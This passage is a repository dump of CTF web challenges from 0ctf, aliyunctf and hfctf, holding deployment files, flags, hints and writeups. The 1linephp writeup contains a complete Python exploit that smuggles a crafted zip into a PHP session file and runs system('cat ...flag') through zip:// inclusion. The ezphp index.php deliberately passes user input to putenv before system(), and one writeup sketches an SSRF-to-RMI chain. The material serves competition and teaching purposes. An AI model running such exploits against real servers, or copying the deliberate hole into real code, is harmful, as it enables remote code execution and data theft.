105 | 把zip文件的前16个字节删除后作为payload即可。
106 | 
107 | 预期解中session文件的内容为16字节prefix+修改offset后的zip+suffix。
108 | 
109 | 非预期解中session文件的内容为16字节prefix+去除前16个字节后的zip+suffix。
110 | 
111 | ##### why?
112 | 
113 | 通过阅读libzip的源码可以发现，其在读取zip内的文件时，先根据CDH中的offset找到LFH的位置，然后在LFH块中并没有解析全部内容，而是直接根据相对位置读取file name length和extra field length，用这两个值的和再加上30作为压缩数据的offset，直接读取压缩数据。
114 | 
115 | 因此，在本题中，文件的前16个字节对libzip没有任何意义，可以任意修改。
116 | 


--------------------------------------------------------------------------------
/0ctf-2021/1linephp/writeup/1linephp_writeup_en.md:
--------------------------------------------------------------------------------
  1 | ## 1linephp
  2 | 
  3 | #### solution
  4 | 
  5 | ##### zip
  6 | 
  7 | The zip extension of PHP uses the libzip library. By reading the source code of libzip, you can find that the way to parse the zip file is from the end to the beginning. First, search for the MAGIC of EOCD at the end of the file, and then read CDH according to the EOCD offset , and finally read the compressed file data according to the offset in CDH.
  8 | 
  9 | This way of parsing makes it possible to insert extra data at the beginning and the end of the zip. Just fix the two offsets accordingly to allow libzip to parse normally.
 10 | 
 11 | If the ZIP_CHECKCONS option flag is passed to zip_open, the check during parsing will be stricter.
 12 | 
 13 | ###### Note
 14 | 
 15 | Fix offset using *zip* tool: https://github.com/perfectblue/ctf-writeups/tree/master/2021/0ctf-2021-quals/onelinephp
 16 | 
 17 | Some contestants found that they can get some useful information by search:
 18 | 
 19 | - https://gynvael.coldwind.pl/?id=523
 20 | - http://roverdoge.top
 21 | 
 22 | ##### session
 23 | 
 24 | PHP_SESSION_UPLOAD_PROGRESS: https://www.php.net/manual/zh/session.upload-progress.php
 25 | 
 26 | session.save_path: https://www.php.net/manual/zh/session.configuration.php#ini.session.save-path
 27 | 
 28 | Using this feature, you can insert a piece of controllable data into a session file with a controllable file name. The specific details have been analyzed in many articles and will not be repeated here.
 29 | 
 30 | In addition to time race, a more stable method can also be used.
 31 | 
 32 | > When the [session.upload_progress.enabled](https://www.php.net/manual/en/session.configuration.php#ini.session.upload-progress.enabled) INI option is enabled, PHP will be able to track the upload progress of individual files being uploaded.
 33 | 
 34 | As long as the file upload is slower, you can keep the upload progress information in the session file longer, see exp for details.
 35 | 
 36 | ##### CcL's exp
 37 | 
 38 | ```python
 39 | import requests
 40 | import socket
 41 | 
 42 | port = 50081
 43 | php_session_id = "dd9c6236c439f75b78cf6ef8d1efca31"
 44 | payload = b"ccl_PK\x03\x04\x14\x00\x00\x00\x08\x00\xe5Q\xd9Rs\xaei\xe7\x1d\x00\x00\x00 \x00\x00\x00\x0b\x00\x1c\ x00include.phpUT\t\x00\x03-<\xd5`-<\xd5`ux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00s\xb0\xb1 /\xc8(PHM\xce\xc8WP\x89ww\r\x896\x88\xd5\x800\x0cc5\xad\xb9\x00PK\x01\x02\x1e\x03\x14\x00\x00\x00\x08\x00\ xe5Q\xd9Rs\xaei\xe7\x1d\x00\x00\x00 \x00\x00\x00\x0b\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xa4\x81\ x14\x00\x00\x00include.phpUT\x05\x00\x03-<\xd5`ux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00PK\x05\ x06\x00\x00\x00\x00\x01\x00\x01\x00Q\x00\x00\x00v\x00\x00\x00\x00\x00"
 45 | 
 46 | 
 47 | def exp():
 48 |     res = requests.get(
 49 |         f"http://111.186.59.2:{port}/",
 50 |         params={
 51 |             "yxxx": f"zip:///tmp/sess_{php_session_id}#include",
 52 |             "0": "system",
 53 |             "1": "cat /dd810fc36330c200a_flag/flag",
 54 |         },
 55 |     )
 56 |     print(res.text)
 57 | 
 58 | 
 59 | def build_http_request_packet(req: requests.PreparedRequest):
 60 |     packet = b""
 61 |     packet += f"{req.method} {req.path_url} HTTP/1.1\r\n".encode()
 62 |     for header, value in req.headers.items():
 63 |         packet += f"{header}: {value}\r\n".encode()
 64 |     packet += b"\r\n"
 65 |     if req.body is not None:
 66 |         if "Content-Length" in req.headers:
 67 |             if type(req.body) is str:
 68 |                 packet += req.body.encode()
 69 |             else:
 70 |                 packet += req.body
 71 |         else:
 72 |             for part in req.body:
 73 |                 packet += f"{len(part):x}\r\n".encode()
 74 |                 packet += f"{part}\r\n".encode()
 75 |             packet += b"0\r\n\r\n"
 76 |     return packet
 77 | 
 78 | 
 79 | def do_so():
 80 |     req = requests.Request(
 81 |         "POST",
 82 |         f"http://111.186.59.2:{port}/",
 83 |         headers={"Host": f"111.186.59.2:{port}"},
 84 |         cookies={"PHPSESSID": php_session_id},
 85 |         data={
 86 |             "PHP_SESSION_UPLOAD_PROGRESS": payload,
 87 |         },
 88 |         files={"file": ("simple.txt", b"ccl" * 4096)},
 89 |     )
 90 |     packet = build_http_request_packet(req.prepare())
 91 |     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 92 |     s.connect(("111.186.59.2", port))
 93 |     s.sendall(packet[:-8])
 94 |     exp()
 95 |     s.sendall(packet[-8:])
 96 |     s.close()
 97 | 
 98 | 
 99 | if __name__ == "__main__":
100 |     do_so()
101 | ```
102 | 
103 | #### unintended solution
104 | 
105 | Delete the first 16 bytes of the zip file and use it as the payload.
106 | 
107 | The content of the session file in the expected solution is a 16-byte prefix + zip with offset fixed + suffix.
108 | 
109 | The content of the session file in the unexpected solution is the 16-byte prefix + zip with the first 16 bytes removed + suffix .
110 | 
111 | ##### why?
112 | 
113 | By reading the source code of libzip, it can be found that when reading the file in the zip, it first finds the position of the LFH according to the offset in the CDH, and then does not parse the entire content in the LFH block, but directly reads the file name length and extra field length according to the relative offset, use the sum of these two values and 30 as the offset of the compressed data, and read the compressed data directly.
114 | 
115 | Therefore, in this challenge, the first 16 bytes of the file are useless to libzip and can be replaced by any value.


--------------------------------------------------------------------------------
/0ctf-2021/2rm1/deploy/attachment.link:
--------------------------------------------------------------------------------
1 | https://mega.nz/file/thYHzADA#_n4QfYmSu5noM4n1G-rrkpjvZuxLFbZ9mbxesFNGRxA
2 | 


--------------------------------------------------------------------------------
/0ctf-2021/2rm1/writeup.md:
--------------------------------------------------------------------------------
1 | curl -> 302 -> gopher -> ssrf -> registry and rmiserver -> rebind or attach agent -> rmiclient
2 | 


--------------------------------------------------------------------------------
/0ctf-2022/3rm1/deploy/3rm1-reset.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | while true
4 | do
5 |     docker-compose down -v
6 |     docker-compose up -d
7 |     sleep 5m
8 | done
9 | 


--------------------------------------------------------------------------------
/0ctf-2022/3rm1/deploy/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '2'
 2 | services:
 3 |   rmiclient:
 4 |     build: ./rmiclient
 5 |     restart: always
 6 |     ports: 
 7 |       - 8080:8090
 8 |   rmiserver:
 9 |     build: ./rmiserver
10 |     restart: always
11 |     ports: 
12 |       - 1099:1099
13 | 


--------------------------------------------------------------------------------
/0ctf-2022/3rm1/deploy/rmiclient/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM openjdk:8u201-alpine
 2 | 
 3 | 
 4 | RUN addgroup -S ctfgroup && adduser -S ctf -G ctfgroup
 5 | RUN mkdir /opt/app
 6 | 
 7 | COPY threermiclient.jar /opt/app
 8 | COPY flag /flag
 9 | 
10 | WORKDIR /opt/app
11 | 
12 | USER ctf
13 | CMD ["java", "-jar", "/opt/app/threermiclient.jar"]
14 | 


--------------------------------------------------------------------------------
/0ctf-2022/3rm1/deploy/rmiclient/flag:
--------------------------------------------------------------------------------
1 | flag{8a66704e47832bdfa8803b00fca726cf}
2 | 


--------------------------------------------------------------------------------
/0ctf-2022/3rm1/deploy/rmiclient/threermiclient.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waderwu/My-CTF-Challenges/b2c7452b602dc6b59da5df0750d64419e6a90b1e/0ctf-2022/3rm1/deploy/rmiclient/threermiclient.jar


--------------------------------------------------------------------------------
/0ctf-2022/3rm1/deploy/rmiserver/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM openjdk:8u201-alpine
 2 | 
 3 | 
 4 | RUN addgroup -S ctfgroup && adduser -S ctf -G ctfgroup 
 5 | RUN mkdir /opt/app
 6 | 
 7 | COPY threermiserver.jar /opt/app
 8 | 
 9 | WORKDIR /opt/app
10 | 
11 | USER ctf
12 | CMD ["java", "-jar", "/opt/app/threermiserver.jar"]
13 | 


--------------------------------------------------------------------------------
/0ctf-2022/3rm1/deploy/rmiserver/threermiserver.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waderwu/My-CTF-Challenges/b2c7452b602dc6b59da5df0750d64419e6a90b1e/0ctf-2022/3rm1/deploy/rmiserver/threermiserver.jar


--------------------------------------------------------------------------------
/0ctf-2022/3rm1/readmd.md:
--------------------------------------------------------------------------------
1 | - hint 1: https://i.blackhat.com/eu-19/Wednesday/eu-19-An-Far-Sides-Of-Java-Remote-Protocols.pdf page 50
2 | 
3 | - hint 2: hint 2: https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/Spring1.java
4 | 


--------------------------------------------------------------------------------
/0ctf-2022/3rm1/writeup/readme.md:
--------------------------------------------------------------------------------
1 | [0ctf-2022-soln-3rm1](https://github.com/ceclin/0ctf-2022-soln-3rm1)
2 | 
3 | [perfect r00t 3rm1 writeup](https://github.com/perfectblue/ctf-writeups/tree/master/2022/0ctf-2022/3rm1)


--------------------------------------------------------------------------------
/0ctf-2022/hessian-onlyJdk/deploy/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM openjdk:8u342-slim
 2 | 
 3 | 
 4 | RUN adduser ctf && addgroup ctfgroup && adduser ctf ctfgroup
 5 | RUN mkdir /opt/app
 6 | 
 7 | COPY hessian-onlyJdk.jar /opt/app
 8 | COPY JavaUtils.class /opt/app
 9 | COPY jvmtiagent.so /opt/app
10 | COPY flag /flag
11 | 
12 | WORKDIR /opt/app
13 | 
14 | USER ctf
15 | CMD ["java", "-agentpath:/opt/app/jvmtiagent.so=/opt/app/JavaUtils.class", "-jar", "/opt/app/hessian-onlyJdk.jar"]
16 | 


--------------------------------------------------------------------------------
/0ctf-2022/hessian-onlyJdk/deploy/JavaUtils.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waderwu/My-CTF-Challenges/b2c7452b602dc6b59da5df0750d64419e6a90b1e/0ctf-2022/hessian-onlyJdk/deploy/JavaUtils.class


--------------------------------------------------------------------------------
/0ctf-2022/hessian-onlyJdk/deploy/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '2'
2 | services:
3 |   web:
4 |     build: ./
5 |     restart: always
6 |     ports: 
7 |       - 8090:8090
8 | 


--------------------------------------------------------------------------------
/0ctf-2022/hessian-onlyJdk/deploy/flag:
--------------------------------------------------------------------------------
1 | flag{1826b7f76642cb4a62e5d74a8fe4db5e}
2 | 


--------------------------------------------------------------------------------
/0ctf-2022/hessian-onlyJdk/deploy/hessian-onlyJdk-reset.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | while true
4 | do
5 |     docker-compose down -v
6 |     docker-compose up -d
7 |     sleep 5m
8 | done
9 | 


--------------------------------------------------------------------------------
/0ctf-2022/hessian-onlyJdk/deploy/hessian-onlyJdk.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waderwu/My-CTF-Challenges/b2c7452b602dc6b59da5df0750d64419e6a90b1e/0ctf-2022/hessian-onlyJdk/deploy/hessian-onlyJdk.jar


--------------------------------------------------------------------------------
/0ctf-2022/hessian-onlyJdk/deploy/jvmtiagent.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waderwu/My-CTF-Challenges/b2c7452b602dc6b59da5df0750d64419e6a90b1e/0ctf-2022/hessian-onlyJdk/deploy/jvmtiagent.so


--------------------------------------------------------------------------------
/0ctf-2022/hessian-onlyJdk/readmd.md:
--------------------------------------------------------------------------------
1 | [reference 1](https://lists.apache.org/thread/1mszxrvp90y01xob56yp002939c7hlww)
2 | 
3 | [reference 2](https://x-stream.github.io/CVE-2021-21346.html)


--------------------------------------------------------------------------------
/0ctf-2022/hessian-onlyJdk/writeup/readme.md:
--------------------------------------------------------------------------------
 1 | 
 2 | some interesting staic funtions
 3 | 
 4 | - MethodUtils.invoke
 5 |   - [0ctf-2022-soln-hessian-onlyjdk](https://github.com/ceclin/0ctf-2022-soln-hessian-onlyjdk)
 6 | - System.setProperty + InitalContext.doLookup @福来阁
 7 | - DumpBytecode.dumpBytecode +  System.load @ty1310 @nese
 8 | - com.sun.org.apache.xalan.internal.xslt.Process._main @福来阁 @Water Paddler
 9 | - sun.tools.jar.Main.main
10 |   - [writeup](https://gist.github.com/CykuTW/4c0d105df24acf2218e0aedb67661da9) @Cyku
11 | - System.setProperty + jdk.jfr.internal.Utils.writeGeneratedAsm @StrawHat
12 | - com.sun.org.apache.bcel.internal.util.JavaWrapper
13 |   - [writeup](https://siebene.github.io/2022/09/19/0CTF2022-hessian-onlyjdk-WriteUp/) @Siebene@ 
14 | 


--------------------------------------------------------------------------------
/aliyunctf-2023/bypassit/deploy/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM openjdk:8u332-jdk
 2 | 
 3 | RUN mkdir /opt/app
 4 | RUN mkdir /opt/rasp
 5 | 
 6 | COPY bypassit.jar /opt/app
 7 | COPY flag /flag
 8 | COPY readflag /readflag
 9 | 
10 | RUN chmod 400 /flag
11 | RUN chmod u+s /readflag
12 | 
13 | COPY naiverasp.jar /opt/rasp
14 | COPY libnativerasp.so /opt/rasp
15 | 
16 | WORKDIR /opt/app
17 | 
18 | USER nobody
19 | CMD ["java", "-javaagent:/opt/rasp/naiverasp.jar", "-jar", "/opt/app/bypassit.jar"]


--------------------------------------------------------------------------------
/aliyunctf-2023/bypassit/deploy/bypass2-reset.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | while true
4 | do
5 |     docker-compose down -v
6 |     docker-compose up -d
7 |     sleep 5m
8 | done


--------------------------------------------------------------------------------
/aliyunctf-2023/bypassit/deploy/bypassit.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waderwu/My-CTF-Challenges/b2c7452b602dc6b59da5df0750d64419e6a90b1e/aliyunctf-2023/bypassit/deploy/bypassit.jar


--------------------------------------------------------------------------------
/aliyunctf-2023/bypassit/deploy/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '2'
2 | services:
3 |   web:
4 |     build: ./
5 |     restart: always
6 |     ports: 
7 |       - 8080:8080


--------------------------------------------------------------------------------
/aliyunctf-2023/bypassit/deploy/flag:
--------------------------------------------------------------------------------
1 | aliyunctf{here_is_your_flag}


--------------------------------------------------------------------------------
/aliyunctf-2023/bypassit/deploy/libnativerasp.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waderwu/My-CTF-Challenges/b2c7452b602dc6b59da5df0750d64419e6a90b1e/aliyunctf-2023/bypassit/deploy/libnativerasp.so


--------------------------------------------------------------------------------
/aliyunctf-2023/bypassit/deploy/naiverasp.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waderwu/My-CTF-Challenges/b2c7452b602dc6b59da5df0750d64419e6a90b1e/aliyunctf-2023/bypassit/deploy/naiverasp.jar


--------------------------------------------------------------------------------
/aliyunctf-2023/bypassit/deploy/readflag:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waderwu/My-CTF-Challenges/b2c7452b602dc6b59da5df0750d64419e6a90b1e/aliyunctf-2023/bypassit/deploy/readflag


--------------------------------------------------------------------------------
/hfctf-2022/ezchain/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM openjdk:8u181-slim
 2 | 
 3 | MAINTAINER yxxx
 4 | ENV REFRESHED_AT 2022-03-09
 5 | ENV LANG C.UTF-8
 6 | 
 7 | RUN sed -i 's/http:\/\/security.debian.org/http:\/\/mirrors.163.com/g' /etc/apt/sources.list
 8 | RUN sed -i 's/http:\/\/deb.debian.org/http:\/\/mirrors.163.com/g' /etc/apt/sources.list
 9 | RUN apt-get update -y
10 | 
11 | ENV DEBIAN_FRONTEND noninteractive
12 | 
13 | 
14 | 
15 | RUN useradd ctf && mkdir /opt/app
16 | 
17 | COPY ezchain.jar /opt/app
18 | WORKDIR /opt/app
19 | 
20 | 
21 | EXPOSE 8090
22 | USER ctf
23 | 
24 | 
25 | CMD ["java", "-jar", "/opt/app/ezchain.jar"]


--------------------------------------------------------------------------------
/hfctf-2022/ezchain/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '2.4'
 2 | services:
 3 |   nginx:
 4 |     image: nginx:1.15
 5 |     ports:
 6 |       - "0.0.0.0:8090:80"
 7 |     restart: always
 8 |     volumes:
 9 |         - ./nginx.conf:/etc/nginx/conf.d/default.conf:ro
10 |     networks:
11 |       - internal_network
12 |       - out_network
13 |   web:
14 |     build: ./
15 |     restart: always
16 |     volumes:
17 |         - ./flag:/flag:ro
18 |     networks:
19 |       - internal_network
20 | networks:
21 |     internal_network:
22 |         internal: true
23 |         ipam:
24 |             driver: default
25 |     out_network:
26 |         ipam:
27 |             driver: default


--------------------------------------------------------------------------------
/hfctf-2022/ezchain/ezchain.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waderwu/My-CTF-Challenges/b2c7452b602dc6b59da5df0750d64419e6a90b1e/hfctf-2022/ezchain/ezchain.jar


--------------------------------------------------------------------------------
/hfctf-2022/ezchain/flag:
--------------------------------------------------------------------------------
1 | HFCTF{test}


--------------------------------------------------------------------------------
/hfctf-2022/ezchain/nginx.conf:
--------------------------------------------------------------------------------
 1 | server {
 2 |     listen       80;
 3 |     server_name  localhost;
 4 | 
 5 |     location / {
 6 |         root   /usr/share/nginx/html;
 7 |         index  index.html index.htm;
 8 | 		proxy_pass http://web:8090;
 9 |     }
10 | 
11 |     #error_page  404              /404.html;
12 | 
13 |     # redirect server error pages to the static page /50x.html
14 |     #
15 |     error_page   500 502 503 504  /50x.html;
16 |     location = /50x.html {
17 |         root   /usr/share/nginx/html;
18 |     }
19 | }


--------------------------------------------------------------------------------
/hfctf-2022/ezphp/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM php:7.4.28-fpm-buster
 2 | 
 3 | LABEL Maintainer="yxxx"
 4 | ENV REFRESHED_AT 2022-03-14
 5 | ENV LANG C.UTF-8
 6 | 
 7 | RUN sed -i 's/http:\/\/security.debian.org/http:\/\/mirrors.163.com/g' /etc/apt/sources.list
 8 | RUN sed -i 's/http:\/\/deb.debian.org/http:\/\/mirrors.163.com/g' /etc/apt/sources.list
 9 | RUN apt upgrade -y && \
10 |     apt update -y && \
11 |     apt install nginx -y
12 | 
13 | ENV DEBIAN_FRONTEND noninteractive
14 | 
15 | 
16 | 
17 | COPY index.php /var/www/html
18 | COPY default.conf /etc/nginx/sites-available/default
19 | COPY nginx.conf /etc/nginx/nginx.conf
20 | 
21 | RUN rm -rf /var/www/html/index.nginx-debian.html
22 | 
23 | COPY flag /flag
24 | 
25 | 
26 | EXPOSE 80
27 | 
28 | CMD php-fpm -D && nginx -g 'daemon off;'
29 | 


--------------------------------------------------------------------------------
/hfctf-2022/ezphp/default.conf:
--------------------------------------------------------------------------------
 1 | ##
 2 | # You should look at the following URL's in order to grasp a solid understanding
 3 | # of Nginx configuration files in order to fully unleash the power of Nginx.
 4 | # https://www.nginx.com/resources/wiki/start/
 5 | # https://www.nginx.com/resources/wiki/start/topics/tutorials/config_pitfalls/
 6 | # https://wiki.debian.org/Nginx/DirectoryStructure
 7 | #
 8 | # In most cases, administrators will remove this file from sites-enabled/ and
 9 | # leave it as reference inside of sites-available where it will continue to be
10 | # updated by the nginx packaging team.
11 | #
12 | # This file will automatically load configuration files provided by other
13 | # applications, such as Drupal or Wordpress. These applications will be made
14 | # available underneath a path with that package name, such as /drupal8.
15 | #
16 | # Please see /usr/share/doc/nginx-doc/examples/ for more detailed examples.
17 | ##
18 | 
19 | # Default server configuration
20 | #
21 | server {
22 | 	listen 80 default_server;
23 | 	listen [::]:80 default_server;
24 | 
25 | 	# SSL configuration
26 | 	#
27 | 	# listen 443 ssl default_server;
28 | 	# listen [::]:443 ssl default_server;
29 | 	#
30 | 	# Note: You should disable gzip for SSL traffic.
31 | 	# See: https://bugs.debian.org/773332
32 | 	#
33 | 	# Read up on ssl_ciphers to ensure a secure configuration.
34 | 	# See: https://bugs.debian.org/765782
35 | 	#
36 | 	# Self signed certs generated by the ssl-cert package
37 | 	# Don't use them in a production server!
38 | 	#
39 | 	# include snippets/snakeoil.conf;
40 | 
41 | 	root /var/www/html;
42 | 
43 | 	# Add index.php to the list if you are using PHP
44 | 	index index.html index.htm index.nginx-debian.html index.php;
45 | 
46 | 	server_name _;
47 | 
48 | 	location / {
49 | 		# First attempt to serve request as file, then
50 | 		# as directory, then fall back to displaying a 404.
51 | 		try_files $uri $uri/ =404;
52 | 	}
53 | 
54 | 	# pass PHP scripts to FastCGI server
55 | 	#
56 | 	location ~ \.php$ {
57 | 		include snippets/fastcgi-php.conf;
58 | 
59 | 		# With php-fpm (or other unix sockets):
60 | 	#	fastcgi_pass unix:/run/php/php7.3-fpm.sock;
61 | 		# With php-cgi (or other tcp sockets):
62 | 		fastcgi_pass 127.0.0.1:9000;
63 | 	}
64 | 
65 | 	# deny access to .htaccess files, if Apache's document root
66 | 	# concurs with nginx's one
67 | 	#
68 | 	#location ~ /\.ht {
69 | 	#	deny all;
70 | 	#}
71 | }
72 | 
73 | 
74 | # Virtual Host configuration for example.com
75 | #
76 | # You can move that to a different file under sites-available/ and symlink that
77 | # to sites-enabled/ to enable it.
78 | #
79 | #server {
80 | #	listen 80;
81 | #	listen [::]:80;
82 | #
83 | #	server_name example.com;
84 | #
85 | #	root /var/www/example.com;
86 | #	index index.html;
87 | #
88 | #	location / {
89 | #		try_files $uri $uri/ =404;
90 | #	}
91 | #}
92 | 


--------------------------------------------------------------------------------
/hfctf-2022/ezphp/flag:
--------------------------------------------------------------------------------
1 | HFCTF{test}


--------------------------------------------------------------------------------
/hfctf-2022/ezphp/index.php:
--------------------------------------------------------------------------------
1 | <?php (empty($_GET["env"])) ? highlight_file(__FILE__) : putenv($_GET["env"]) && system('echo hfctf2022');?>


--------------------------------------------------------------------------------
/hfctf-2022/ezphp/nginx.conf:
--------------------------------------------------------------------------------
 1 | user www-data;
 2 | worker_processes 1;
 3 | pid /run/nginx.pid;
 4 | include /etc/nginx/modules-enabled/*.conf;
 5 | 
 6 | events {
 7 | 	worker_connections 768;
 8 | 	# multi_accept on;
 9 | }
10 | 
11 | http {
12 | 
13 | 	##
14 | 	# Basic Settings
15 | 	##
16 | 
17 | 	sendfile on;
18 | 	tcp_nopush on;
19 | 	tcp_nodelay on;
20 | 	keepalive_timeout 65;
21 | 	types_hash_max_size 2048;
22 | 	# server_tokens off;
23 | 
24 | 	# server_names_hash_bucket_size 64;
25 | 	# server_name_in_redirect off;
26 | 
27 | 	include /etc/nginx/mime.types;
28 | 	default_type application/octet-stream;
29 | 
30 | 	##
31 | 	# SSL Settings
32 | 	##
33 | 
34 | 	ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE
35 | 	ssl_prefer_server_ciphers on;
36 | 
37 | 	##
38 | 	# Logging Settings
39 | 	##
40 | 
41 | 	access_log /var/log/nginx/access.log;
42 | 	error_log /var/log/nginx/error.log;
43 | 
44 | 	##
45 | 	# Gzip Settings
46 | 	##
47 | 
48 | 	gzip on;
49 | 
50 | 	# gzip_vary on;
51 | 	# gzip_proxied any;
52 | 	# gzip_comp_level 6;
53 | 	# gzip_buffers 16 8k;
54 | 	# gzip_http_version 1.1;
55 | 	# gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;
56 | 
57 | 	##
58 | 	# Virtual Host Configs
59 | 	##
60 | 
61 | 	include /etc/nginx/conf.d/*.conf;
62 | 	include /etc/nginx/sites-enabled/*;
63 | }
64 | 
65 | 
66 | #mail {
67 | #	# See sample authentication script at:
68 | #	# http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript
69 | #
70 | #	# auth_http localhost/auth.php;
71 | #	# pop3_capabilities "TOP" "USER";
72 | #	# imap_capabilities "IMAP4rev1" "UIDPLUS";
73 | #
74 | #	server {
75 | #		listen     localhost:110;
76 | #		protocol   pop3;
77 | #		proxy      on;
78 | #	}
79 | #
80 | #	server {
81 | #		listen     localhost:143;
82 | #		protocol   imap;
83 | #		proxy      on;
84 | #	}
85 | #}
86 | 


--------------------------------------------------------------------------------